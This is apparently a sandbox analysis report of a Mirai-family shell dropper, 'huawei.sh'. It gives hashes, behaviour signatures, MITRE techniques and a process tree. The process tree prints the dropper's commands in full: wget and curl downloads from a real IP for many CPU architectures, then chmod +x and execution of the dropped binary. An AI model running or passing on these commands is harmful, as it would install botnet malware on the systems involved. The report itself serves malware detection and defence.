Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
143s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11/03/2025, 08:29
Static task
static1
Behavioral task
behavioral1
Sample
huawei.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
huawei.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
huawei.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
huawei.sh
-
Size
2KB
-
MD5
8d6ef05d1948cecba422e0f81c304cd0
-
SHA1
c596c34265e6be88262c26a8acdf85a15718c163
-
SHA256
bea439bc741379378dd3608de6921b4079a7d18a26bde6eb8a301da29abb788b
-
SHA512
a32f2820f0a047e990a1a96e14f00cc60a1051851944c77dc66db069beb22ed1846efdbee2540394f53e49576c897d99f02a8b5aa36b54857b02638ee49ffb2e
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 747 chmod 763 chmod 797 chmod 808 chmod 814 chmod 823 chmod 828 chmod 836 chmod 675 chmod 687 chmod 695 chmod 720 chmod 734 chmod -
Deletes itself 2 IoCs
pid Process 721 WTH 764 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 676 huawei.sh /tmp/WTH 688 huawei.sh /tmp/WTH 696 huawei.sh /tmp/WTH 721 huawei.sh /tmp/WTH 735 huawei.sh /tmp/WTH 749 huawei.sh /tmp/WTH 764 huawei.sh /tmp/WTH 798 huawei.sh /tmp/WTH 809 huawei.sh /tmp/WTH 815 huawei.sh /tmp/WTH 824 huawei.sh /tmp/WTH 829 huawei.sh /tmp/WTH 837 huawei.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself prapsl8jsgrjws7v 721 WTH Changes the process name, possibly in an attempt to hide itself 2p8fjdqd58njpkru 764 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/maps WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/maps WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 682 curl 686 cat 679 wget -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/EdiAf.arm5 wget File opened for modification /tmp/EdiAf.arm6 wget File opened for modification /tmp/EdiAf.m68k curl File opened for modification /tmp/EdiAf.sh4 wget File opened for modification /tmp/EdiAf.sh4 curl File opened for modification /tmp/EdiAf.mpsl curl File opened for modification /tmp/EdiAf.arm wget File opened for modification /tmp/EdiAf.arm5 curl File opened for modification /tmp/EdiAf.m68k wget File opened for modification /tmp/EdiAf.i686 curl File opened for modification /tmp/EdiAf.x86 curl File opened for modification /tmp/EdiAf.mips curl File opened for modification /tmp/EdiAf.arm curl File opened for modification /tmp/EdiAf.arm7 wget File opened for modification /tmp/EdiAf.ppc wget File opened for modification /tmp/EdiAf.spc wget File opened for modification /tmp/EdiAf.spc curl File opened for modification /tmp/EdiAf.mips wget File opened for modification /tmp/EdiAf.mpsl wget File opened for modification /tmp/EdiAf.arm6 curl File opened for modification /tmp/EdiAf.arm7 curl File opened for modification /tmp/EdiAf.ppc curl File opened for modification /tmp/EdiAf.arc curl File opened for modification /tmp/EdiAf.x86 wget File opened for modification /tmp/WTH huawei.sh
Processes
-
/tmp/huawei.sh/tmp/huawei.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:649 -
/usr/bin/wgetwget http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:651
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/catcat EdiAf.x862⤵PID:673
-
-
/bin/chmodchmod +x EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:676
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:679
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:682
-
-
/bin/catcat EdiAf.mips2⤵
- System Network Configuration Discovery
PID:686
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:688
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:691
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/catcat EdiAf.mpsl2⤵PID:694
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.mpsl EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:696
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:698
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/catcat EdiAf.arm2⤵PID:718
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:721
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:724
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/catcat EdiAf.arm52⤵PID:732
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Reads runtime system information
PID:735
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/catcat EdiAf.arm62⤵PID:745
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Reads runtime system information
PID:749
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/catcat EdiAf.arm72⤵PID:762
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:764
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:786
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/catcat EdiAf.ppc2⤵PID:795
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:798
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat EdiAf.m68k2⤵PID:807
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:809
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:811
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/catcat EdiAf.spc2⤵PID:813
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 huawei.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-spSNB9 WTH2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:815
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.i6862⤵PID:817
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat EdiAf.i6862⤵PID:822
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 huawei.sh WTH2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:824
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:825
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat EdiAf.sh42⤵PID:827
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 huawei.sh WTH2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:829
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arc2⤵PID:831
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat EdiAf.arc2⤵PID:835
-
-
/bin/chmodchmod +x EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 huawei.sh WTH2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/WTH./WTH huawei.selfrep2⤵PID:837
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e932653d32b429c51de2046623fa71d2
SHA132ecc535e6cf6e99f105835d4a7cb75ef4cb233a
SHA25687dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
SHA512e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
-
Filesize
33KB
MD5029a7185777b7f885a6c3807e46b7365
SHA187372b0029b72446861c7b429e3ef1626c337218
SHA25642c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
SHA5124890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
-
Filesize
35KB
MD57327f58c0e15f6086301a81780e100dc
SHA1292bb04ad4df407ac687ef1df1071659708bd3bb
SHA256b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
SHA5124cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
-
Filesize
32KB
MD5addb1cd662dd870b9b7ed5273d6fa76e
SHA16e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
SHA256cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
SHA51228525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
-
Filesize
21KB
MD5a117b1b367633cb07f0795bd5f0c6f8f
SHA132bfac42c7134383c6381b94c0d75317fcb56d11
SHA25640fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
SHA5127e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
-
Filesize
75KB
MD5642dff628df548a6c458f004fd3b5aa1
SHA1cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
SHA256219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
SHA512dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851